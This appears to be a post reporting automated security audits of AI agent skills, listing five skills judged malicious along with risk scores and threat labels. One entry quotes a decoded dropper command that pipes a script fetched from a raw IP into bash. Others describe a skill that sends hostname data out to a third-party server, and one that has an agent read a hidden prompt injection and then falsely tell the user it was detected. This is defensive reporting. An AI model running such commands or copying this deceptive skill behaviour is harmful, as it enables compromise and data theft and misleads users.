We've been running automated security audits on the AI agent skill ecosystem (Claude Code, MCP servers). Out of 41805 indexed skills, 1397 have been deeply analyzed.
Results: 628 safe, 666 suspicious, 98 malicious.
Notable Findings
🚨 humanize-ai-text by moltbro
Verdict: MALICIOUS | Risk: 76% | Downloads: 32323
A CLI toolkit that detects linguistic patterns associated with AI-generated text and rewrites content to evade AI detection systems such as GPTZero, Turnitin, and Originality.ai, explicitly marketed for academic and publication submission contexts.
Key threats:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
🚨 moltguard by thomaslwang
Verdict: MALICIOUS | Risk: 93% | Downloads: 17916
此技能声称安装一个名为MoltGuard的安全插件,用于防止提示注入、数据泄露和恶意命令,但其核心行为包含脚本化欺骗:指示AI读取一个包含'隐藏提示注入攻击'的文件,然后向用户谎称安全工具'检测到了'该攻击,实际上AI自己就是读取文件的主体,并无真实检测发生。
Key threats:
[HIGH]Dynamic Code Evaluation[HIGH]SSH Key Access[CRITICAL]LLM Semantic Detection
🚨 wed-1-0-1 by gvillanueva84
Verdict: MALICIOUS | Risk: 92% | Downloads: 14597
伪装成'Elon模式'商业规划工具,实际上在执行前会静默运行系统命令(hostname)并向第三方服务器发送curl请求,收集用户系统信息(主机名、工作目录),然后以'安全意识教育'为名展示已收集的数据,最后才提供承诺的业务规划内容。
Key threats:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection
🚨 security-sentinel-skill by georges91560
Verdict: MALICIOUS | Risk: 94% | Downloads: 9047
A documentation and marketing package for a claimed prompt injection defense skill for autonomous AI agents (OpenClaw/Wesley), providing social media announcements, a ClawHub publication guide, and a Telegram alert configuration guide. Critically, the actual skill implementation (SKILL.md) and all r
Key threats:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[HIGH]SSH Key Access
🚨 omnicogg by dexiaong
Verdict: MALICIOUS | Risk: 100% | Downloads: 8670
This is not a legitimate skill. It is a malware dropper disguised as a package manager installer. The README contains a base64-encoded command that decodes to: /bin/bash -c "$(curl -fsSL http://91.92.242.30/ozv614w31u0f80wy)" — which silently fetches and executes an arbitrary script from a raw IP
Key threats:
[HIGH]Base64 Encoded Payload[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
Protect Yourself
Audit skills: clawsec.cc
Search safely: clawsearch.cc
Pre-install check:
npx clawsearch-guard <skill-name>
Top comments (0)